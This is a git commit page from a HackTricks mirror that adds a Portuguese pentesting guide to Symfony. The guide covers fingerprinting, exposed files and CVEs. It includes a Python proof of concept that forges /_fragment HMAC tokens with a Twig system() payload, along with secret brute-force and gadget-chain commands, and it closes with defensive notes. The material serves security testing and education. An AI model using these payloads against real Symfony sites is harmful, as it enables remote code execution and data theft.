maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/symphony.md'

Browse Source
This commit is contained in:
Translator 2025-07-23 10:24:43 +00:00
parent 708cf9c321
commit 86221152e5
1 changed files with 117 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

121
src/network-services-pentesting/pentesting-web/symphony.md
View File

@ -2,10 +2,123 @@
{{#include ../../banners/hacktricks-training.md}}
Dê uma olhada nos seguintes posts:
Symfony é um dos frameworks PHP mais amplamente utilizados e aparece regularmente em avaliações de alvos empresariais, de e-commerce e CMS (Drupal, Shopware, Ibexa, OroCRM … todos incorporam componentes Symfony). Esta página coleta dicas ofensivas, configurações incorretas comuns e vulnerabilidades recentes que você deve ter em sua lista de verificação ao descobrir uma aplicação Symfony.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
> Nota histórica: Uma grande parte do ecossistema ainda utiliza a versão **5.4 LTS** (EOL **Novembro 2025**). Sempre verifique a versão menor exata, pois muitos avisos de segurança de 2023-2025 foram corrigidos apenas em lançamentos de patch (por exemplo, 5.4.46 → 5.4.50).
---
## Recon & Enumeração
### Finger-printing
* Cabeçalhos de resposta HTTP: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` ou cookies que começam com `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Vazamentos de código-fonte (`composer.json`, `composer.lock`, `/vendor/…`) frequentemente revelam a versão exata:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Rotas públicas que existem apenas no Symfony:
* `/_profiler` (Symfony **Profiler** & barra de ferramentas de depuração)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (páginas de erro formatadas)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (controladores front-end de desenvolvimento pré-4.0)
* Wappalyzer, BuiltWith ou listas de palavras ffuf/feroxbuster: `symfony.txt` → procure por `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Arquivos e endpoints interessantes
| Caminho | Por que é importante |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Frequentemente mal implantados → vazam `APP_SECRET`, credenciais DB, SMTP, chaves AWS |
| `/.git`, `.svn`, `.hg` | Divulgação de código-fonte → credenciais + lógica de negócios |
| `/var/log/*.log`, `/log/dev.log` | Configuração incorreta do web-root expõe rastreamentos de pilha |
| `/_profiler` | Histórico completo de requisições, configuração, contêiner de serviços, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Ponto de entrada usado por ESI/HInclude. Abuso possível uma vez que você conheça `APP_SECRET` |
| `/vendor/phpunit/phpunit/phpunit` | RCE do PHPUnit se acessível (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & às vezes vaza rastros de exceção |
---
## Vulnerabilidades de alto impacto (2023-2025)
### 1. Divulgação de APP_SECRET ➜ RCE via `/_fragment` (também conhecido como “secret-fragment”)
* **CVE-2019-18889** originalmente, mas *ainda* aparece em alvos modernos quando a depuração é deixada habilitada ou `.env` é exposto.
* Uma vez que você conheça o `APP_SECRET` de 32 caracteres, crie um token HMAC e abuse do controlador interno `render()` para executar Twig arbitrário:
```python
# PoC requer o segredo
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE em Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Excelente artigo e script de exploração: blog Ambionics (linkado nas Referências).
### 2. Sequestro de Processo do Windows CVE-2024-51736
* O componente `Process` pesquisou o diretório de trabalho atual **antes** do `PATH` no Windows. Um atacante capaz de fazer upload de `tar.exe`, `cmd.exe`, etc. em um web-root gravável e acionar `Process` (por exemplo, extração de arquivos, geração de PDF) ganha execução de comando.
* Corrigido em 5.4.50, 6.4.14, 7.1.7.
### 3. Fixação de Sessão CVE-2023-46733
* O guardião de autenticação reutilizou um ID de sessão existente após o login. Se um atacante definir o cookie **antes** que a vítima se autentique, ele sequestra a conta após o login.
### 4. XSS no sandbox do Twig CVE-2023-46734
* Em aplicações que expõem templates controlados pelo usuário (CMS admin, construtor de e-mail), o filtro `nl2br` poderia ser abusado para contornar o sandbox e injetar JS.
### 5. Cadeias de gadgets Symfony 1 (ainda encontradas em aplicativos legados)
* `phpggc symfony/1 system id` produz um payload Phar que aciona RCE quando um unserialize() acontece em classes como `sfNamespacedParameterHolder`. Verifique endpoints de upload de arquivos e wrappers `phar://`.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Cheat-Sheet de Exploração
### Calcular token HMAC para `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce fraco `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE via exposed Symfony Console
Se `bin/console` for acessível através de `php-fpm` ou upload direto de CLI:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Use gadgets de desserialização dentro do diretório de cache ou escreva um template Twig malicioso que será executado na próxima solicitação.
---
## Notas defensivas
1. **Nunca implemente debug** (`APP_ENV=dev`, `APP_DEBUG=1`) em produção; bloqueie `/app_dev.php`, `/_profiler`, `/_wdt` na configuração do servidor web.
2. Armazene segredos em variáveis de ambiente ou `vault/secrets.local.php`, *nunca* em arquivos acessíveis através do document-root.
3. Imponha a gestão de patches inscreva-se em avisos de segurança do Symfony e mantenha pelo menos o nível de patch LTS.
4. Se você estiver rodando no Windows, atualize imediatamente para mitigar CVE-2024-51736 ou adicione uma defesa em profundidade `open_basedir`/`disable_functions`.
---
### Ferramentas ofensivas úteis
* **ambionics/symfony-exploits** RCE de fragmento secreto, descoberta de rotas de depuração.
* **phpggc** Cadeias de gadgets prontas para Symfony 1 & 2.
* **sf-encoder** pequeno auxiliar para calcular HMAC de `_fragment` (implementação em Go).
## Referências
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}